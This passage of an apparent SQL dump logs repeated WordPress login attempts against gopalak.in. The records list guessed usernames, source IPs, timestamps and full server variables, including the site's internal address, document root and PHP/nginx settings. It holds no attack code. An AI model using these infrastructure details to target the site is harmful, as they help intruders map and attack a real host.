00:00:00'),(94972,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52649\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746741722.071775;s:12:\"REQUEST_TIME\";i:1746741722;}}','35.154.1.88',1,'2025-05-09 03:32:03','2025-05-10 07:10:33'),(94973,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52648\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746741722.0710199;s:12:\"REQUEST_TIME\";i:1746741722;}}','35.154.1.88',1,'2025-05-09 03:32:04','2025-05-10 07:10:32'),(94974,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52654\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746741723.882777;s:12:\"REQUEST_TIME\";i:1746741723;}}','35.154.1.88',1,'2025-05-09 03:32:05','2025-05-10 07:10:33'),(94975,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52651\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746741724.525255;s:12:\"REQUEST_TIME\";i:1746741724;}}','35.154.1.88',1,'2025-05-09 03:32:06','2025-05-10 07:10:31'),(94976,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52655\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746741724.8279541;s:12:\"REQUEST_TIME\";i:1746741724;}}','35.154.1.88',1,'2025-05-09 03:32:06','2025-05-10 07:10:34'),(94977,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50248\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746742076.682337;s:12:\"REQUEST_TIME\";i:1746742076;}}','198.54.114.29',0,'2025-05-09 03:37:58','1970-01-01 00:00:00'),(94978,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49028\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746742653.0001709;s:12:\"REQUEST_TIME\";i:1746742653;}}','185.232.41.148',0,'2025-05-09 03:47:34','1970-01-01 00:00:00'),(94979,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61765\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746742998.8251741;s:12:\"REQUEST_TIME\";i:1746742998;}}','35.154.1.88',1,'2025-05-09 03:53:20','2025-05-10 07:10:31'),(94980,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61767\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746742998.4579401;s:12:\"REQUEST_TIME\";i:1746742998;}}','35.154.1.88',1,'2025-05-09 03:53:21','2025-05-10 07:10:33'),(94981,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61764\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746742998.4573269;s:12:\"REQUEST_TIME\";i:1746742998;}}','35.154.1.88',1,'2025-05-09 03:53:21','2025-05-10 07:10:32'),(94982,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61766\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746743000.1344559;s:12:\"REQUEST_TIME\";i:1746743000;}}','35.154.1.88',1,'2025-05-09 03:53:21','2025-05-10 07:10:33'),(94983,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61768\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746743000.1352091;